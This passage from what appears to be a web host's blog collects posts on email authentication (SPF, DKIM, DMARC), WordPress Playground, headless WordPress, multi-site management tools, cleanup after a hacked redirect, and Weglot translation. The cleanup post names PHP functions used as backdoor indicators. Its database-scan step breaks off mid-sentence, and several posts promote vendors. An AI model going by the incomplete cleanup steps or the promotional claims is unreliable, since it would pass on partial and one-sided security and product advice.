Creating an Onboarding plugin – To help users quickly create a new site using the integrated templates, colors, and fonts, I plan to develop an onboarding plugin to guide them through the initial setup process.

I am excited about these plans and look forward to implementing them to enhance the Simplenet theme and provide an even better experience for our users.

These are the plans with the Simplenet WordPress theme. If you use the Simplenet theme, I invite you to leave me feedback and suggestions to make it even better.

Download the theme from WordPress.org, or you can easily install it directly in the WordPress admin interface of the Themes > Add New section.

How to prevent your emails from ending up in spam

Andrei Chira — Wed, 13 Mar 2024 00:00:00 GMT

Have you sent an important email to a client or supplier but have not heard back? Your email may have ended up in the recipient’s Spam folder. Your essential email is lost among hundreds of spam messages.

Email deliverability is not a precise science, which can irritate senders of all kinds. For various reasons, such as your authentication status or your email server’s reputation, you may unintentionally end up in the spam folder.

We’ve all been in this situation and know how frustrating it can be. But with a few simple steps, you can prevent your emails from ending in spam and ensure your messages reach the recipient’s inbox.

To solve a problem, we must first define the problem correctly, and in this case, that means understanding why certain emails are marked as spam.

Why do emails end up in spam?

Most email services use automatic filters to separate legitimate emails from spam. These filters analyse various aspects of an email, such as content, subject, sender and others.

Due to the increase in spam, mail server filters have become very strict, and every domain owner should manage their domain reputation to ensure that emails sent from that domain reach the recipient’s inbox.

Mail servers can classify emails as spam due to several elements:

lack of authorisations and validations (SPF, DKIM, DMARC)
mass mailing
Based on the content or preferences of the recipients, if the emails are not read repeatedly, are deleted without being read or are marked as spam, email servers learn these preferences and start filtering them as spam.

Both Gmail and Yahoo announced as early as October 2023 that starting in February 2024, they would further increase the strictness of their filters, affecting all emails sent to addresses belonging to Gmail and Yahoo.

Things that until now were only considered good practices will now become mandatory to ensure that the emails we send do not end up in spam. These are:

Email authentication using DKIM, SPF and DMARC.
Reducing spam and maintaining a spam complaint rate below 0.3%.
Allow people to unsubscribe by clicking a single link and honour unsubscribes within two days.
RFC 5322 compliance, PTR records, rDNS
Make sure your sending server IP addresses have valid reverse DNS records.
Use a TLS connection for email transmission.

How do you stop your emails from being marked as spam?

The most important thing to do is to make sure that all emails sent on behalf of your domain are sent with authentication by valid sources authorised to send email on behalf of the domain.

You can start by determining who is sending mail on behalf of the domain. Examples of sources that send emails are:

you and your colleagues through mail clients on computers or phones (Outlook, Apple Mail, etc.)
your website
customer management (CRM) application
the service that sends newsletters
etc.

1. Identification of sources

By definition, e-mails sent through mail clients are sent with authentication; when configuring the mail client, you enter the correct data, such as email address, password, incoming/outgoing server, ports, etc. These emails are sent through the mail server that offers you hosting.

Emails sent from WordPress sites

Some sites send emails when someone leaves a comment on the blog.

Others, such as online stores, also send transactional emails: order notifications, delivery notifications, invoices, etc. These emails are crucial and should reach the recipient’s inbox.

By default, WordPress sends emails through a PHP function. It can work without problems, especially when the email hosting is on the same server as the website hosting. However, the method could be better because the sending is done without authentication. Hence, the chances of it ending up in spam are high.

The best practice recommendation is to use a WordPress plugin to send emails via SMTP authentication.

We use the FluentSMTP WordPress plugin to force WordPress not to send emails via the standard method (wp_mail) but via SMTP authentication. This is a more professional method that ensures a better delivery rate.

The plugin can be configured to send through the domain’s mail server or specialised services such as Sendgrid, Brevo, Amazon SES, SMTP.com, Mailgun, Postmark, etc.

Customer Relationship Management (CRM) application

Using such a platform, you can send emails to your customers.

For example, our platform sends emails with invoices, payment notifications, and responses to support tickets. So, emails sent through this application are vital and should not be sent through the standard PHP method without authentication.

Most platforms have integrated options to set an SMTP server through which to send emails, just as it is set in WordPress through the module presented above.

We, for example, send these emails through a specialised service - Postmark.

Among the services we tested were Mandrill from Mailchimp, Amazon SES, Google, our email server, Sendgrid, Mailgun, Sendinblue, and Postmark. Postmark is the most expensive ($1.25 per 1000 emails), but it’s the best quality, with the highest inbox delivery rate.

If you use a newsletter service like Mailchimp, its servers will send emails on your (your domain’s) behalf and will need authorisation.

The sources that send emails are authorised by implementing the necessary DNS entries for validation.

2. Authorisation of sources

After establishing the valid sources through which we send emails, the second step is to authorise these sources so that the spam filters of the recipients’ mail servers know that we indeed send the emails on our behalf.

What we can do here is to implement the necessary DNS entries for the source of the emails to be authorised (SPF, DKIM, DMARC).

SPF (Sender Policy Framework)

SPF allows the receiving email server to verify during email delivery that an email purporting to be from a particular domain is sent by a server authorised by that domain’s administrators.

Wikipedia

The Sender Policy Framework (SPF) DNS entry is a list of servers (or IPs) authorised to send mail on behalf of our domain.

Your TXT entry may look like this:

v=spf1 include:relay.whmpanels.com -all

By default, only one source is authorised to send mail on behalf of your domain: the Kiravo servers (relay.whmpanels.com).

If you want to add other sources, such as Postmark and Mailchimp, you can edit the DNS entries from cPanel’s Zone Editor section.

For example, you can add two more sources authorised to send emails on behalf of your domain:

v=spf1 include:relay.whmpanels.com include:spf.mtasv.net include:servers.mcsv.net -all

Now, there are three authorised sources:

Kiravo servers (relay.whmpanels.com)
Postmark servers (spf.mtasv.net)
Mailchimp servers (servers.mcsv.net)

These entries are made available to you by each provider, and you need to add them.

DomainKeys Identified Mail (DKIM)

DKIM allows the recipient to verify that an email purporting to be from a particular domain has been authorised by the owner of that domain. It applies a digital signature associated with a domain name to each email message.

Wikipedia

DKIM is a digital signature used to send mail to the server. This is usually a TXT DNS entry with the name default._domainkey and a value like:

v=DKIM1; k=rsa;p=MIGfMA0GCSqasdkjagdiuagfA4GNADCBiQKBgQCjpd9u4vATaUFwhHVCVuNKNDDKAunbKWSnSTwVNiYjakjahkkUkeMpVqvR7Z2jzNBW1aOf1vxuW+FL4N2+PZNA6Vzk5I3sfsdfsdfmnANSashfayWoOurWm0nvYJg755sQibyYrRB6v3 wuvxUNmsdfsdkfsdjASFnafAmSvmtSZwIDAQAB

Such an entry has already been generated by cPanel to authorise the Kiravo server. This should remain the same.

Separate TXT entries must be added to authorise other sources. Specialised email services, such as Postmark or Mailchimp, in our example, provide you with these TXT entries to add.

Other services use other methods; for example, Amazon SES will require you to add 3 CNAME entries for DKIM validation. Each service has documentation and instructions for implementation; if you follow them carefully, you can quickly validate these sources.

Domain-based Message Authentication, Reporting & Conformance (DMARC)

DMARC is an email authentication, policy, and reporting protocol. It relies on SPF and DKIM protocols, adding links to the author’s domain name (“From:”), published policies for handling recipient authentication failures and reporting from receivers to senders to improve and monitor domain protection against e-fraudulent email.

dmarc.org

DMARC is not implemented by default on any email servers; it must be implemented by each site owner for their domain.

It is the domain owner’s responsibility to manage his sources, authorizations, and source validation or rejection policies.

Using Cloudflare’s DNS hosting, you can implement DMARC through them with a single click. You can find it in the Email > DMARC Management section. This will add the DNS entry you need for DMARC.

Another tool, which we also use, you can find here – https://dmarc.postmarkapp.com

This service provided by Postmark generates a TXT DNS entry that you need to add to your DNS zones. It looks something like this:

v=DMARC1; p=none; pct=100; rua=mailto:name@domain.com; sp=none; aspf=r;

Values in DMARC can be changed:

p=none can be set as p=quarantine or p=reject
pct=100 means that 100% of emails will be filtered; it can be set to a lower value
rua=mailto:name@domain.com will change with your email address, the one you want to receive the reports to

You will receive reports every month with the emails sent during the past week on behalf of your domain and the sources sending emails on behalf of your domain.

The reports from the above service help you identify the sources (who is sending emails on behalf of your domain) and block invalid sources.

DMARC extends the two mechanisms (SPF and DKIM) to allow you to manage your domain reputation.

For example, after implementing DMARC for kiravo.net, we saw in the reports that several hundred emails were being sent in the name of kiravo.net from IPs in Russia, China or Vietnam, with no connection to the emails we sent.

I changed the DNS entry for DMARC from p=none to p=reject so that only SPF and DKIM-aligned emails are allowed.

3. Other good practices

The authentication protocols described above (SPF, DKIM and DMARC) help confirm the authenticity of emails sent by your domain and significantly reduce the risk of being marked as spam.

But even with all these implementations done right, emails can still end up in spam.

If your email contains specific characteristics associated with spam or is sent from a domain known to send spam, there’s a good chance it will be automatically marked as spam.

Make sure you follow these best practices:

Do not send unsolicited emails
Avoid forwarders
Use a relevant and non-spammy subject: Avoid exaggerated or alarmist subjects often associated with spam emails. Make sure the subject line reflects the actual content of the email and is not just designed to attract attention.
Optimise email content: Avoid overusing keywords or links in your emails. Limit the use of images and make sure the text is well-structured and relevant.
Require opt-in and confirmation: If you send marketing emails, ensure recipients have voluntarily opted in to receive your messages. Send them a confirmation email to confirm their subscription.
Regularly update your subscriber list: Remove inactive or invalid email addresses from your subscriber list. This way, you will maintain a clean list of recipients.

Conclusion

Sending emails that don’t end up in spam can be challenging, and unfortunately, it is still the responsibility of site/domain owners.

However, these operations become crucial if the business involves intensive email use. Therefore, by following these steps and adhering to good emailing practices, you can significantly improve the chances of your messages being successfully delivered to your recipients’ inboxes.

How to run WordPress in your browser

Andrei Chira — Mon, 09 Oct 2023 00:00:00 GMT

WordPress Playground is an open-source experiment to provide a running WordPress instance directly in your browser. You no longer need an experimental website on a local development machine to test themes and plugins. I firmly believe there is no more convenient method than WordPress Playground because it runs in your browser and doesn’t require a special setup.

You should familiarise yourself with WordPress Playground if you don’t have any clue about it. This article will delve into WordPress Playground, exploring what it is and how to make the most of it.

What Is WordPress Playground

WordPress Playground is a development environment where users can safely experiment with WordPress without affecting live websites. It is still in the development phase and has some limited features, but overall, it works satisfactorily, and many users are pleased with it. So, you should anticipate new features and frequent changes in the near future.

The great benefit of this tool is its ability to spin up a WordPress website in the browser without requiring a server and a database. Moreover, you can choose different WordPress and PHP versions. Content creators, bloggers, and reviewers should look at it because Playground can be easily integrated into an app or website.

In a nutshell, WordPress Playground is a tool to test themes and plugins, develop websites, and learn WordPress.

WordPress Playground Anatomy

WordPress runs on PHP, a server-side language that stores data using SQL. Hence, how does it function directly from the user’s browser? Certainly, you can use this tool without having an idea about its anatomy, but it’s good to know how it works.

A WebAssembly-based WordPress runtime replaced the PHP scripting. Advanced users can refer to the documentation to learn more about this innovative approach. Instead of MySQL, WordPress Playground uses a plugin that runs SQLite. Lastly, a web server is implemented in JavaScript as a Service Worker to intercept the HTTP requests and interpret them in a separate thread.

WordPress Playground Use Cases

Adam Zielinski, the creator of WordPress Playground, is straightforward about his work – the tool was designed to generate a WordPress instance swiftly. This rapid creation of a WordPress instance was previously unattainable. WordPress Playground offers significant benefits and various ways to maximise its utility. Here’s a breakdown of its use cases:

Training Area for Newbies

Setting up a local WordPress development system or a local host can be time-consuming, even for intermediate users. Newcomers may find it daunting to install these configurations. For WordPress beginners, having a testing environment is crucial for learning the basics. Before the advent of WordPress Playground, establishing a testing environment posed significant challenges for amateurs. Thanks to Playground, creating your testing site is as simple as ABC.

Theme and Plugin Testing Area

WordPress Playground is an excellent tool for both developers and users. Developers appreciate it because users can test their products in a straightforward and effective environment. No matter how detailed a tutorial or documentation is, having a practical space for experimentation is more relevant. Users are delighted to have a powerful tool to test all the themes and plugins for their projects.

Embedded WordPress Install

Content creators and WordPress reviewers are excited about this tool because it lets them showcase a theme or a plugin directly in their blog posts. You can embed Playground on your website by using the tag as follows:

<iframe src="https://playground.wordpress.net/"></iframe>

Construct a Website

I don’t recommend building websites using Playground, but certainly, it’s a real possibility. Bear in mind that you can save your work and upload it to another host.

Quick Tour of WordPress Playground

You don’t need any guidance to start using Playground. Type in its address - https://playground.wordpress.net/ and customise the WordPress install you need. Currently, you have three storage options:

Temporary (your website disappears anytime you refresh the browser)
Persistent (your website is stored in the cache memory of the browser)
Live directory from your computer (your website is stored on your computer hard drive)

Next, choose the type of PHP and WordPress versions and press the “Apply changes” button to get your WordPress website. Hover your mouse over the “My WordPress website” button, and from the drop-down menu, choose “Dashboard” or “Themes”. Select “Dashboard,” and you will be directed to the WordPress dashboard admin.

The major downside of Playground is the lack of connection to the official WordPress.org themes and plugin repositories. It means uploading new themes and plugins is the only way to add them. If you overcome this limitation, you can still enjoy a ‘WordPress-like experience’ directly from your browser.

Query API

Working with an Application Programming Interface (API) isn’t comfortable for most WordPress users. Yet, it’s pretty simple, even for less techie people. Go to the WordPress Playground documentation and explore the Query API. You will learn plenty of simple configurations that will simplify your work. The following examples are relevant:

Install a theme by adding its name as a parameter to the Playground URL. For instance, you’d like to add the Astra theme from the WordPress repository. In this case, add the query parameter ?theme=astra to the Playground URL.
Similarly, install a plugin; add the ?plugin=yourpluginofchoice, where yourpluginofchoice is the name of the plugin to install.

Limitations of WordPress Playground

WordPress Playground is still in the experiencing phase, so it may have unexpected glitches. Don’t worry; many talented developers and engineers are working hard to improve it. However, it has two major limitations:

Unsupported network connection, so that users can’t access themes and plugins from the WordPress directory;
Temporary access, meaning that every time you refresh your browser, whether intentionally or unintentionally, your work disappears. To address this, change the storage type to persistent mode, and your browser will store your work.

Wrapping Up

WordPress Playground is a time-saving tool that should have been developed years ago. Nevertheless, it’s great to have it now, helping us become better WordPress users and make informed decisions when choosing themes and plugins. Remember that it’s a freshly released project with room for improvement. You are welcome to join the team and contribute to making it an even better tool.

The beginner’s guide to headless WordPress

Elena Chira — Tue, 18 Jan 2022 00:00:00 GMT

WordPress is almost two decades old, and it seems that it will continue to stay for many years. A digital product that is still relevant after two decades is almost unparalleled. Many content management systems (CMSs) were launched after WordPress’ birthday—May 27th, 2003—and are already forgotten, even by their founders. Besides, Internet users are impatient and always ready to test new products and services. Under these circumstances, is WordPress a miracle or an outstanding product?

The correct answer is something in between these two options. WordPress is 100% an excellent CMS that gained traction in the proper context. This CMS started as a blogging platform suitable for casual users. The timing was perfect because content publishing boomed a few years after WordPress’ launching. WordPress was the proper tool at the proper moment.

Headless WordPress has generated some buzz, and people rushed to believe that the days of the old WordPress are gone. Read the following paragraphs to learn more about headless WordPress and how conventional WordPress will evolve.

WordPress Current State

WordPress is a mature product that dominates the market of CMSs by a colossal margin. It’s somehow surprising, but WordPress’ market share keeps on growing. For instance, the WordPress growth in 2021 alone is only slightly smaller than the overall market share of the biggest competitor.

WordPress wouldn’t reach this level if its development team didn’t pay attention to its users’ needs. The developers constantly pushed the envelope and added new and useful features. Even though it started as a blogging platform, nowadays WordPress is suitable for almost any kind of project.

Despite the impressive work of all contributors, WordPress still has room to improve. Performance, security, and the management of complex websites are areas where WordPress has issues. Its admin dashboard is user-friendly, but a few aspects related to site customization might be reconsidered.

The core development team will introduce Full Site Editing (FSE) in 2022. It’s a pretty significant change for the entire WordPress community. Its main purpose is to streamline site-building and make WordPress even more accessible to non-developers. Certainly, it will generate harsh debates in the first months after implementation, but users will adapt to this change.

The success of WordPress resides in the satisfaction of all users. FSE is for everyone, but less trained users will appreciate it more as they will get an improved experience. Instead of writing code or installing a plugin, webmasters will get more customization options directly from the WordPress admin dashboard.

Headless WordPress caters to enterprise projects. It’s not only the contribution of the WordPress development team—it’s a collective work of the entire WordPress community and many startups.

Headless WordPress

To understand headless WordPress you have to understand traditional WordPress. Your standard WordPress install has a monolith approach—the backend and frontend are coupled. That’s why people refer to WordPress as a traditional, standard, coupled, and monolith entity. The backend is the admin dashboard, where you produce content and customize the channel to publish it. The frontend is the platform where people consume the content. In most cases, it’s the blog page or a custom homepage. This is convenient for casual users, but enterprise projects have different needs.

Headless WordPress extracts the benefits of coupled WordPress and implements it on a different platform. The backend remains the same WordPress admin dashboard; it’s a familiar and enjoyable platform for content creation. The front-end is decoupled and allows multi-platform and cross-channel publishing. Practically, the same content on the backend of your site is published on different mediums, such as a mobile app, your own website, third-party website, or social media. In this way, you have full control over the frontend channels. You are no longer restricted by themes and plugins—you can use whatever platform and coding language you want.

Benefits of Headless WordPress

While a simple website doesn’t need the functionalities of headless WordPress, an enterprise project requires them. Headless WordPress comes with many benefits, but it has a few weaknesses as well. The following are the main advantages of headless WordPress.

Multiple Front-end Channels

You are no longer limited to publishing content only on your website, thanks to headless WordPress. A strong business should always be where its customers are. It depends on the business profile, but a simple website isn’t enough these days. Social media and mobile apps are two capital tools to get in touch with clients. In this context, headless WordPress is the ideal solution that simplifies content production and distribution.

Improved Performance

Performance is one of the most significant drawbacks of traditional WordPress. The WordPress development team and a few partners made up a team focused on improving the CMS performance. The results will come in the near future, but at the moment headless WordPress is speedier.

Smashing Magazine nailed down how headless WordPress improves the site performance. TLTR: despite its more complex structure, the headless format is faster than the coupled version.

Use the Favorite Coding Language

Are you a big fan of Python and you don’t like PHP? Headless WordPress is the best solution in this respect. You are free to use whichever front-end platform, and of course, whichever coding language you prefer to deliver the content to the customers. Additionally, it allows changing the tech stack easily and without losing data.

Enhanced Security

The WordPress core is pretty secure and the development team works permanently to make it even more unhackable. However, from a security perspective, the themes and plugins are big vulnerabilities. The more there are, the more insecure the site is. Headless WordPress eliminates both plugins and themes, so it becomes way more complicated for cybercriminals to break into your site.

Weaknesses of Headless WordPress

Nope, headless WordPress isn’t perfect at all! It has a few weaknesses that make it infeasible for most WordPress users. It’s clear that people won’t suddenly abandon the coupled WordPress for the headless format. It has two major cons that limit its adoption.

Unfriendly for Non-Developers

It’s hard to believe that someone lacking serious coding skills may give a try to headless WordPress. The deployment and maintenance of an online business running on headless WordPress require the involvement of a highly-skilled dev or even a team. Someone just testing the waters will immediately get stuck in creating a headless WordPress site.

Budget-unfriendly

Headless WordPress caters to enterprise projects so it makes sense that it isn’t budget-friendly. However, even mid-size businesses might have a problem hiring a developer to deploy and maintain a website. Taking into account the difficult times we face, only a few entrepreneurs take the risk to switch from traditional to headless. Perhaps it’s a profitable decision in the long term, but it’s another major impediment to mass adoption.

Over to You

Headless WordPress is more complicated, with a steep learning curve to master its potential. Undoubtedly, it comes with some innovative concepts and deserves our attention. While some developers speak highly about headless WordPress, I strongly believe that it can’t rival traditional WordPress. The headless approach is perfect for enterprise projects, but for the rest of the businesses is rather expensive and complicated.

In conclusion, headless WordPress is a refined solution for a niche, but it needs substantial improvements to get mass adopted.

How to manage multiple WordPress sites efficiently

Elena Chira — Tue, 13 Oct 2020 00:00:00 GMT

Efficiently managing multiple WordPress sites is a top priority for all freelancers and agencies. You can spend hours logging in to each site, updating the core, themes, and plugins, editing files, strengthening the security, creating backup copies, and so on. However, some cool tools can simplify these tasks and save you precious time.

Developers constantly release new helpful tools and upgrade existing ones, but these tools can’t replace the human factor. You have to double-check the site’s uptime, integrity, and performance. Still, while the responsibility is still yours, the tools do the leg work for you.

Are you interested in using a helpful tool to better manage your sites? Check out the following options and choose the best one for your needs and preferences.

WPMU DEV

WPMU DEV is a complex platform that does a great favor to webmasters who deal with many sites.

There are a couple of reasons to purchase a subscription. First, the unified dashboard allows you to manage sites from one place—WPMU DEV calls it the Hub. Just add your sites to the Hub, and you won’t need to login to the sites you manage individually. You will have full control over each update, be able to improve the sites’ security, search rankings, and performances, and create backup copies directly from the Hub dashboard. Additionally, you’ll get reports about your activities—a helpful feature for people who take care of clients’ sites.

Second, the WPMU DEV platform streamlines the process of migrating and replicating websites. The hosting services are superior, so you’ll have the perfect environment in which to bring all your clients’ sites to a single platform.

Third, you’ll get some premium plugins. In addition to the Hub, you’ll get access to a few top-class plugins mandatory for a good website. For example, Defender Pro strengthens site security, Smush Pro optimizes images, and Hummingbird Pro improves site performance.

Clearly, WPMU DEV is a great platform that packages a lot of value, but I recommend it only to those with high budgets or webmasters who are responsible for a couple of sites or more. The subscription will set you back $49 per month.

ManageWP Worker

It’s fantastic that such an instrumental plugin that saves you so much time is free of charge. You can use it for unlimited websites for free! The 1,000,000 active installs and a rating of 4.7 say enough about the plugin’s potential.

ManageWP Worker’s dashboard is user-friendly, and adding all your sites is pretty intuitive. It allows you to perform bulk actions, such as installing updates, managing comments, and checking the sites’ integrity.

Users who want more services have to pay for them. Luckily, ManageWP Worker comes with top-class services that are affordable for everyone. You can choose to buy premium addons for each website or buy a bundle if you run more than 25 websites. This degree of flexibility is unique and fully satisfies all users.

CMS Commander

CMS Commander’s unique feature is the focus on content and monetization. Consider this tool if you run multiple blogs, magazine news sites, or affiliate sites because it will help you with marketing and monetization. For instance, from the CMS Commander dashboard, you can bulk insert affiliate links into your posts, import content, and monitor backlink numbers.

Besides these features, CMS Commander is a precious helper for managing any kind of WordPress site. It allows you to bulk update, edit content, monitor sites, and view traffic stats.

Enhanced security is another advantage of this plugin—all data is exchanged through secure encryptions, and users log in with two-factor authentication. You can run complete malware scans with just a single click.

CMS Commander doesn’t have a free option, but the subscriptions are quite affordable.

InfiniteWP Client

InfiniteWP Client is a robust solution for managing multiple websites stress-free. You can install the plugin manually or through cPanel to add your site to the InfiniteWP dashboard. Once you are done with the installation, everything runs smoothly.

If you are on a tight budget, go for the free plan, but it limits you to performing updates and backups and cloning websites. The premium plans package more features, including improved security, uptime monitoring, user management, and malware scanning. Additionally, you can publish blog posts, upload files, and manage comments directly from the InfiniteWP Client dashboard.

iControlWP

iControlWP includes pretty much the same options as any other option on this list. The reliability, focus on security, and pricing flexibility are its unique features. This tool completely satisfies users, and the free plugin in the WordPress repository is highly rated (4.8 stars out of five).

Besides the free plugin, iControlWP offers four paid plans, and all of them include vulnerability scanning and Sucuri malware scans. The two more expensive plans include Shield Security Central—a timesaving helper that strengthens site security.

I love no-credit-card-required trials; in this way, people testing the products don’t risk getting hooked by any special conditions. Luckily, iControlWP sails with a free 15-day trial with no credit card required. Also, don’t worry about the exchange rate if you decide to purchase a premium subscription—you can pay directly in American dollars, euros, or pounds.

WP Remote

Webmasters managing at least 20 sites and who frequently edit sites should take a look at WP Remote. All the premium plans come with in-built staging sites. In plain English, staging sites are site clones available for webmasters to perform site edits and test new features without affecting the online site. In this way, you can avoid crashing your site by mistake.

WP Remote allows you to manage up to 100 sites, but you can contact customer service for special pricing if you run more than 100 sites. You can effectively manage the sites from the WP Remote dashboard hassle-free.

One of WP Remote’s downsides is that only the most expensive plan includes security measures. On top of that, the prices aren’t for those with tight budgets.

MainWP

MainWP is for great webmasters who don’t have financial resources. All you have to do is to install a free plugin on your sites, and then you can manage them all from your site dashboard of choice. You won’t rely on a private server; rather, you’ll run your sites from one of your sites. You can update the sites, improve their security, and manage their posts and pages without a third-party accessing your data.

Over to You

All the above tools will genuinely help you manage multiple WordPress sites efficiently. Check out the descriptions and evaluate which one suits your needs, expectations, and budget. Next, visit the official sites and double-check the features, plans, and documentation. You will make the proper decision by following these steps.

Finally, share your impressions with us if you use any of these tools. Of course, leave a comment with your doubts, ideas, and suggestions. We enjoy engaging with you!

WordPress site redirecting? How to fix it

Elena Chira — Mon, 05 Oct 2020 00:00:00 GMT

If you’ve been frantically googling “Why is my WP site redirecting my users to another website?” you’re most likely a victim of WordPress Redirect Hacking, one of the many innovative hacking methods hackers deploy. To understand this better, you need to understand how WordPress-targeting hackers work. In this article, we’ll also tell you how it impacts your online business, and how you can fix this. Let’s get started.

Signs of a WordPress Hacked Redirect

First of all, let’s understand if your site is showing any of the following signs -

Your website is redirecting its users to another website.
Your administrator sees the “404 Error” page after signing into the dashboard.
Your website is marked as “spam” or “hacked” on Google search results.
Your website shows multiple push notifications that were not created by you.
You are unable to sign in to your account’s admin panel or access the dashboard.
There is some malicious or unidentified code in the .htaccess or index.php file of your WP installation.

If your answers to any of the above were yes, then you have been compromised with a hacked redirect attack. Each of these issues can be severely damaging to your business. Let us see how in the next section.

How WordPress Redirects Can Impact Your Business

insecure website warning

Here are some ways in which redirects attacks can impact your business:

Your website visitors are redirected to unsolicited external websites, causing an immediate loss of traffic that can affect business revenue – particularly if you are running an eCommerce store.
Even a single redirect could lead to online users losing their trust in your brand and reputation – and are less likely to revisit your website.
Loss of SEO ranking as Google could suspend or even blacklist your website; this can further lead to incoming traffic loss.
Your website could also be suspended by your WordPress hosting company.
Your administrator can no longer access the Admin dashboard page or perform any admin tasks.
Your redirected visitors could end up sharing personal or confidential information on the external phishing website – because of which hackers could misuse the data to make money or carry out unauthorized transactions.
Finally, hackers now have a way to infect your website again – even after cleaning and fixing the problem.

These are just a few ways in which a redirect attack can compromise your website and business. So, how can you detect and fix your website following a redirect attack? Let’s find out.

How to Clean Your Hacked Website from Hacked Redirect

To clean and fix your website from the Hacked Redirect infection, you can use either of the following methods:

Automatic malware cleanup: that uses a plugin or tool for malware scanning and cleaning.
Manual malware cleanup: that is the technical way of site cleanup.

Let us discuss each of these methods, and determine which is more effective and easier to use.

Method 1 - Automatic Malware Cleanup

Thanks to its global popularity, WordPress has several security plugins or tools that you can easily install and use to detect and remove any malware like Malicious redirects, SEO Spam, Link Injection and more. One of the most popular ones is MalCare.

Apart from being effective against different types of malware infections, it is fast, user-friendly, and can detect and remove malware instantly. While there are many paid security tools, we recommend MalCare because, from our experience, it offers a one-stop solution for malware scanning and removal. Here is how you can use MalCare:

Download and install the MalCare plugin for your website.
After installation and activation, the tool automatically performs a complete scan of your site.
From the Security panel in the dashboard, view if there are any hacked files.

scan website

Next, click the “Auto Clean” button in the Security panel.

That is all you need to do – MalCare will clean your website from any infections or malicious code.

Finally, to protect your website from future attacks, navigate to the “Website Hardening” section and click “Apply Hardening.”

security hardening

Apart from easy scanning and cleanups, the security plugin offers a range of other security features that makes it worth your money.

site health

If you are not keen to invest in a paid tool, you can opt for manual scanning and removal. Let’s discuss this in the next section.

Method 2 – Manual Malware Cleanup

Before we go ahead, it’s important to remember that manual malware cleanups are a challenge even for seasoned users – plus, it is time-consuming and involves a few technical steps. We would only recommend you use this method if you are confident of tech and WordPress knowledge and skills.

Before performing a manual cleanup, we recommend taking a complete backup of your website and database. You can use a backup plugin like BlogVault that automates database backups and stores your files securely in an independent location.

Once that’s done, follow the below steps for manual cleanup:

Your Core WP files are most likely to be targeted by hackers. Don’t forget to check them which include wp-config.php, wp-settings.php, index.php, wp-load.php, and .htaccess files in your installation.

manual removal

Download a fresh copy of WP (with the same version as your installation) and then use the Diffchecker tool to manually compare your installed files with the new copy.
Next, check for backdoors in your installation that hackers use to access your site even after you have cleaned it. For this, check for malicious PHP functions like eval, base64_decode, and gzinflate.
The next step is to sign into the “Users” section of your dashboard and check for any suspicious or unknown Admin users. If found, then remove any such users.
Apart from your core WP files, your installed plugins/themes can also contain malicious code. So, you need to compare each plugin or theme with its original copy, that you will need to download from their sites.
The final step is to scan for any malware in your database. For this, you need to search for terms like

A note of caution before we go - this method is fairly technical and complicated and requires you to modify critical Core WP files and database tables.

Conclusion

Hackers are constantly innovating and you’ll always find newer and more advanced forms of WordPress Hacked Redirect – that cannot be detected manually.

While there are many security steps that you can take to protect your website, installing a security plugin is the best investment you can make to keep your site secure. In the long term, it is certainly worth the time and effort saved, not to mention the peace of mind it provides. Or, you could invest in a WordPress maintenance plan.

We hope you found this article to be informative and useful. Do share your thoughts and views with us regarding this article. Look forward to hearing from you.

How to translate a WordPress website

Elena Chira — Thu, 04 Jun 2020 00:00:00 GMT

Translating your WordPress website is a logical step for those wanting to sell or do business in new markets. Ensuring your website visitors can read the content of your site in their native language is beneficial in a number of ways, allowing you to reach new customers, improve your SEO rankings, and build better customer experiences.

Whilst translating a website can seem like a daunting task, it’s actually incredibly simple when using a WordPress multilingual plugin, in particular, Weglot.

We’ll take a look at what to look for when choosing a WordPress translation solution, how Weglot works and finish with a tutorial on how to translate your WordPress website in just a couple of minutes.

What to look for in a translation plugin

Not all WordPress multilingual plugins are created equal, and there are, in fact, a number of features you should tick off your list to ensure you’re getting the full package when it comes to translating your website.

1. Number of languages available

Seems fairly basic, but do check if your WordPress multilingual plugin of choice actually supports the language(s) you’re planning to add to your website. That also goes for any languages you might consider adding in the future - so think long term!

2. Translation

Bear in mind that not all multilingual plugins actually take care of the translation side of things - which seems like a pretty straightforward requirement in terms of website translation. Some require you to pay an additional amount on top of the initial plugin purchase. Choosing a multilingual solution that both translates and displays the content of your website will make things a lot easier for you.

3. Translation management

Often, Google Translate is the first thought when someone mentions automated translation, but what you lack here is any form of editing rights. Choosing a solution that provides both automatic translation for speed and the option to edit these translations means you’ll be able to give your website visitors the best possible experience.

4. Set up

Check how simple the multilingual plugin is to install. Juggling around with multiple files to download and install is exhausting and time-consuming. Select a solution that doesn’t require any code or the need for a developer.

5. Multilingual SEO

Translating your website is just step one. Choosing a WordPress multilingual plugin that also ensures you’re set up for multilingual SEO completes things and ensures you’re actually searchable in your new markets.

6. Support

Don’t forget to check the reviews of the plugin. Is the support team reactive? Are their customers satisfied? Get the real story from the people using the multilingual plugin. Remember, it’s unlikely you’ll get any support from free solutions.

How Weglot works

As the highest-rated WordPress multilingual plugin, Weglot stands out in a number of ways. Its ease of use is just one of the main reasons why it has more than 50,000 active installs.

Once you’ve followed the quick setup process (just 5 minutes), you’ll have an instantly multilingual WordPress website. Weglot works by automatically detecting all the content on your website (including content coming from other plugins), translating it using a first layer of automated translation, and then displaying the content under language subdirectories.

The difference between Weglot and some of its competitors is that there are no fiddly manual translation steps. Once Weglot is installed on your WordPress site, everything is translated instantly.

Weglot then gives you complete control over your translations. You can choose to keep the automated translations, make edits to them manually, or order professional translators through the Weglot dashboard.

You have two choices when it comes to managing and editing your translations. The first is through Weglot’s ‘visual editor,’ which lets you edit all your website translations in a live preview of your site. Any edits you make here will automatically be implemented on your real website. It’s a user-friendly way to see exactly where your translations are on the front end of your site.

visual editor

The second option is to edit translations within your translations list, where you can filter by URL.

translations list

Weglot is an SEO optimized solution, meaning that all your content is indexed following Google’s best practices. It translates all of your metadata and automatically adds hreflang tags, meaning that your international SEO is covered.

With Weglot, you’ll also get a language switcher automatically added to your site with the option to customize the design and placement without the need for code. This makes it easy for your site visitors to switch between the languages of their choice.

How to translate your WordPress website with Weglot

Installing Weglot on your site and having a multilingual website up and running is a simple and quick process. Let’s take a look.

Step 1

Search for Weglot in the plugins tab of your WordPress dashboard. Install Weglot, then click the activate button.

setup guide

Step 2

You’ll now see a Weglot tab within your WordPress dashboard. This is where you’ll add your languages. To do this, enter the unique API key—available on your Weglot dashboard (you’ll need to create an account to get access to this).

main configuration

Then select the original language of your site and enter the new languages you want to translate your site into. Click ‘Save Changes’.

Step 3

Your multilingual site is now live! A language switcher button will now appear on your site so your site visitors can select their preferred language.

Interested in trying out Weglot? Start your free 10 day trial.

4 methods to find and fix broken links

Andrei Chira — Thu, 27 Feb 2020 00:00:00 GMT

